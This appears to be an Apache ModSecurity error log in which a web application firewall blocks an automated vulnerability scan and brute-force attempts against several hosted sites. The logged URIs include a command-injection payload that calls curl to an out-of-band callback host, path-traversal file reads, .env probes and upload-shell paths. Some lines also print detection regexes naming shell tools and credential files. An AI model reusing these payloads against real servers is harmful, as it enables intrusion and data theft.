[Tue May 26 12:52:31.141518 2026] [security2:error] [pid 461618:tid 461848] [client 23.94.40.119:34254] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/kylin/api/user/authentication"] [unique_id "ahVKN1yiSlSCHr1fdr2ijgAAAOk"]
[Tue May 26 12:52:31.413361 2026] [security2:error] [pid 461618:tid 461789] [client 23.94.40.119:34264] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/kylin/api/cubes/kylin_streaming_cube/ 31`curl d8akjpc38ndbrs5c98fghg5o4jw3tq4mh.oast.fun`/migrate"] [unique_id "ahVKN1yiSlSCHr1fdr2ikwAAAK4"]
[Tue May 26 12:52:32.040191 2026] [security2:error] [pid 461618:tid 461806] [client 23.94.40.119:34290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/hms/user-login.php"] [unique_id "ahVKOFyiSlSCHr1fdr2ipgAAAL8"]
[Tue May 26 12:52:32.475216 2026] [security2:error] [pid 461618:tid 461859] [client 23.94.40.119:34292] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKOFyiSlSCHr1fdr2itgAAAPQ"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:52:32.481308 2026] [security2:error] [pid 461618:tid 461787] [client 23.94.40.119:34302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKOFyiSlSCHr1fdr2itwAAAKw"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:52:32.741370 2026] [security2:error] [pid 461618:tid 461852] [client 23.94.40.119:34308] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/import-xml-feed/readme.txt"] [unique_id "ahVKOFyiSlSCHr1fdr2iugAAAO0"]
[Tue May 26 12:52:32.958979 2026] [security2:error] [pid 461618:tid 461791] [client 23.94.40.119:34336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:download. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ahVKOFyiSlSCHr1fdr2ixAAAALA"]
[Tue May 26 12:52:33.127158 2026] [security2:error] [pid 461618:tid 461825] [client 23.94.40.119:34348] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVKOVyiSlSCHr1fdr2iyQAAANI"]
[Tue May 26 12:52:33.460692 2026] [security2:error] [pid 461618:tid 461815] [client 23.94.40.119:34354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/login.php"] [unique_id "ahVKOVyiSlSCHr1fdr2i2wAAAMg"]
[Tue May 26 12:52:33.547288 2026] [security2:error] [pid 461618:tid 461779] [client 23.94.40.119:34362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"] [unique_id "ahVKOVyiSlSCHr1fdr2i3gAAAKQ"]
[Tue May 26 12:52:33.587143 2026] [cgid:error] [pid 461618:tid 461872] [client 23.94.40.119:34376] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/execute_cmd.cgi: script not found or unable to stat
[Tue May 26 12:52:33.823914 2026] [security2:error] [pid 461618:tid 461757] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKOVyiSlSCHr1fdr2i0wAAAI4"]
[Tue May 26 12:52:34.135295 2026] [security2:error] [pid 461618:tid 461749] [client 23.94.40.119:34422] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ahVKOlyiSlSCHr1fdr2i7AAAAIY"]
[Tue May 26 12:52:34.393061 2026] [security2:error] [pid 461618:tid 461793] [client 23.94.40.119:34426] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ahVKOlyiSlSCHr1fdr2jFgAAALI"]
[Tue May 26 12:52:34.917653 2026] [security2:error] [pid 461618:tid 461666] [remote 172.236.172.195:50876] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.172.236.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVKOlyiSlSCHr1fdr2jGQAA4y8"]
[Tue May 26 12:52:35.604731 2026] [security2:error] [pid 461618:tid 461674] [remote 65.2.90.30:44296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahVKO1yiSlSCHr1fdr2jNQAA8Dc"]
[Tue May 26 12:52:35.665181 2026] [security2:error] [pid 461618:tid 461849] [client 157.20.138.61:56324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKO1yiSlSCHr1fdr2jNwAAAOo"]
[Tue May 26 12:52:35.665319 2026] [security2:error] [pid 461618:tid 461849] [client 157.20.138.61:56324] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKO1yiSlSCHr1fdr2jNwAAAOo"]
[Tue May 26 12:52:36.009837 2026] [security2:error] [pid 461618:tid 461787] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKO1yiSlSCHr1fdr2jOgAAAKw"]
[Tue May 26 12:52:37.024689 2026] [security2:error] [pid 461618:tid 461867] [client 23.94.40.119:34444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKPVyiSlSCHr1fdr2jZQAAAPw"]
[Tue May 26 12:52:37.734730 2026] [security2:error] [pid 461618:tid 461829] [client 23.94.40.119:34460] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/login.htm"] [unique_id "ahVKPVyiSlSCHr1fdr2jgQAAANY"]
[Tue May 26 12:52:37.947450 2026] [security2:error] [pid 461618:tid 461858] [client 50.80.215.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKPVyiSlSCHr1fdr2jewAAAPM"]
[Tue May 26 12:52:38.220169 2026] [security2:error] [pid 461618:tid 461777] [client 62.244.225.226:41487] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVKPVyiSlSCHr1fdr2jiwAAAKI"]
[Tue May 26 12:52:38.281214 2026] [security2:error] [pid 461618:tid 461810] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKPVyiSlSCHr1fdr2jhgAAAMM"]
[Tue May 26 12:52:38.495414 2026] [security2:error] [pid 461618:tid 461751] [client 23.94.40.119:33496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVKPlyiSlSCHr1fdr2jowAAAIg"]
[Tue May 26 12:52:39.007237 2026] [security2:error] [pid 461618:tid 461862] [client 144.48.82.14:49562] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVKPlyiSlSCHr1fdr2jmgAAAPc"]
[Tue May 26 12:52:39.226333 2026] [security2:error] [pid 461618:tid 461769] [client 23.94.40.119:33504] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/loginizer/readme.txt"] [unique_id "ahVKP1yiSlSCHr1fdr2jugAAAJo"]
[Tue May 26 12:52:39.436272 2026] [cgid:error] [pid 461618:tid 461756] [client 23.94.40.119:33516] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/setup.cgi: script not found or unable to stat
[Tue May 26 12:52:39.957424 2026] [security2:error] [pid 461618:tid 461820] [client 23.94.40.119:33526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/include/makecvs.php"] [unique_id "ahVKP1yiSlSCHr1fdr2jzwAAAM0"]
[Tue May 26 12:52:40.220205 2026] [security2:error] [pid 461618:tid 461793] [client 23.94.40.119:33536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tos/index.php"] [unique_id "ahVKQFyiSlSCHr1fdr2j2gAAALI"]
[Tue May 26 12:52:40.370278 2026] [security2:error] [pid 461618:tid 461799] [client 23.94.40.119:33568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/assets/php/upload.php"] [unique_id "ahVKQFyiSlSCHr1fdr2j4AAAALg"], referer: http://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:52:40.653651 2026] [security2:error] [pid 461618:tid 461842] [client 23.94.40.119:33588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/assets/data/usrimg/3efh8pg7hklde6dlgkrlj6m4hi1.php"] [unique_id "ahVKQFyiSlSCHr1fdr2j6wAAAOM"]
[Tue May 26 12:52:40.897982 2026] [security2:error] [pid 461618:tid 461871] [client 43.173.180.205:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVKQFyiSlSCHr1fdr2j4wAAAQA"]
[Tue May 26 12:52:41.013282 2026] [security2:error] [pid 461618:tid 461780] [client 144.48.82.78:31696] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVKQFyiSlSCHr1fdr2j2QAAAKU"]
[Tue May 26 12:52:41.176694 2026] [security2:error] [pid 461618:tid 461815] [client 23.94.40.119:33606] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/admin/ajax.php"] [unique_id "ahVKQVyiSlSCHr1fdr2j9wAAAMg"]
[Tue May 26 12:52:41.269935 2026] [security2:error] [pid 461618:tid 461816] [client 23.94.40.119:33614] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKQVyiSlSCHr1fdr2kAQAAAMk"]
[Tue May 26 12:52:41.458515 2026] [security2:error] [pid 461618:tid 461768] [client 23.94.40.119:33618] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:cd|perl|killall|traceroute|python|r(?:pm|sync)|yum|apt-get|emerge|lynx|links|mkdir|elinks|cmd|pwd|wget|lwp-(?:download|request|mirror|rget)|id|uname|cvs|svn|(?:s|r)(?:cp|sh)|n(?:et(?:stat|cat)|asm)|rexec|smbclient|t?ftp|ncftp|curl|telnet|g(?:c ..." at REQUEST_URI. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "582"] [id "340023"] [rev "6"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  remote command execution"] [data "cat /"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/kerbynet"] [unique_id "ahVKQVyiSlSCHr1fdr2kCAAAAJk"]
[Tue May 26 12:52:41.489000 2026] [security2:error] [pid 461618:tid 461868] [client 23.94.40.119:33644] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/admin/index.php"] [unique_id "ahVKQVyiSlSCHr1fdr2kCgAAAP0"]
[Tue May 26 12:52:41.593519 2026] [security2:error] [pid 461618:tid 461762] [client 23.94.40.119:33646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKQVyiSlSCHr1fdr2kCwAAAJM"]
[Tue May 26 12:52:41.684566 2026] [security2:error] [pid 461618:tid 461778] [client 23.94.40.119:33660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/incom/modules/uploader/showcase/script.php"] [unique_id "ahVKQVyiSlSCHr1fdr2kEgAAAKM"]
[Tue May 26 12:52:41.711386 2026] [security2:error] [pid 461618:tid 461756] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKQVyiSlSCHr1fdr2j_wAAAI0"]
[Tue May 26 12:52:41.949912 2026] [security2:error] [pid 461618:tid 461799] [client 23.94.40.119:33688] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/goform/setSysAdm"] [unique_id "ahVKQVyiSlSCHr1fdr2kHAAAALg"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in/login.shtml
[Tue May 26 12:52:41.977305 2026] [security2:error] [pid 461618:tid 461841] [client 23.94.40.119:33696] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/actions/authenticate.php"] [unique_id "ahVKQVyiSlSCHr1fdr2kHQAAAOI"]
[Tue May 26 12:52:42.479371 2026] [security2:error] [pid 461618:tid 461811] [client 23.94.40.119:33726] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/auth/requestreset"] [unique_id "ahVKQlyiSlSCHr1fdr2kLgAAAMQ"]
[Tue May 26 12:52:42.745978 2026] [security2:error] [pid 461618:tid 461770] [client 23.94.40.119:33758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/ebook/bookPerPub.php"] [unique_id "ahVKQlyiSlSCHr1fdr2kNgAAAJs"]
[Tue May 26 12:52:42.838285 2026] [security2:error] [pid 461618:tid 461752] [client 23.94.40.119:33790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-post.php"] [unique_id "ahVKQlyiSlSCHr1fdr2kPAAAAIk"]
[Tue May 26 12:52:42.957485 2026] [security2:error] [pid 461618:tid 461827] [client 45.142.80.245:36858] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVKQlyiSlSCHr1fdr2kHgAAANQ"]
[Tue May 26 12:52:43.026949 2026] [security2:error] [pid 461618:tid 461846] [client 23.94.40.119:33798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVKQ1yiSlSCHr1fdr2kQQAAAOc"]
[Tue May 26 12:52:43.168408 2026] [security2:error] [pid 461618:tid 461858] [client 23.94.40.119:33822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php"] [unique_id "ahVKQ1yiSlSCHr1fdr2kSQAAAPM"]
[Tue May 26 12:52:43.447911 2026] [security2:error] [pid 461618:tid 461820] [client 23.94.40.119:33864] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/dfsms/"] [unique_id "ahVKQ1yiSlSCHr1fdr2kUAAAAM0"]
[Tue May 26 12:52:43.478763 2026] [security2:error] [pid 461618:tid 461833] [client 23.94.40.119:33874] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi"] [unique_id "ahVKQ1yiSlSCHr1fdr2kUQAAANo"]
[Tue May 26 12:52:43.788571 2026] [security2:error] [pid 461618:tid 461867] [client 23.94.40.119:33888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ahVKQ1yiSlSCHr1fdr2kXwAAAPw"]
[Tue May 26 12:52:43.829887 2026] [security2:error] [pid 461618:tid 461823] [client 23.94.40.119:33904] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:fileName. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ahVKQ1yiSlSCHr1fdr2kYAAAANA"]
[Tue May 26 12:52:43.906105 2026] [security2:error] [pid 461618:tid 461755] [client 23.94.40.119:33914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php/catalogsearch/advanced/result/"] [unique_id "ahVKQ1yiSlSCHr1fdr2kYQAAAIw"]
[Tue May 26 12:52:44.744541 2026] [security2:error] [pid 461618:tid 461845] [client 23.94.40.119:33938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/account/index.php"] [unique_id "ahVKRFyiSlSCHr1fdr2kfgAAAOY"]
[Tue May 26 12:52:44.748272 2026] [security2:error] [pid 461618:tid 461766] [client 176.65.139.235:55530] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.ans.onesoft.in"] [uri "/.env"] [unique_id "ahVKRFyiSlSCHr1fdr2kfwAAAJc"]
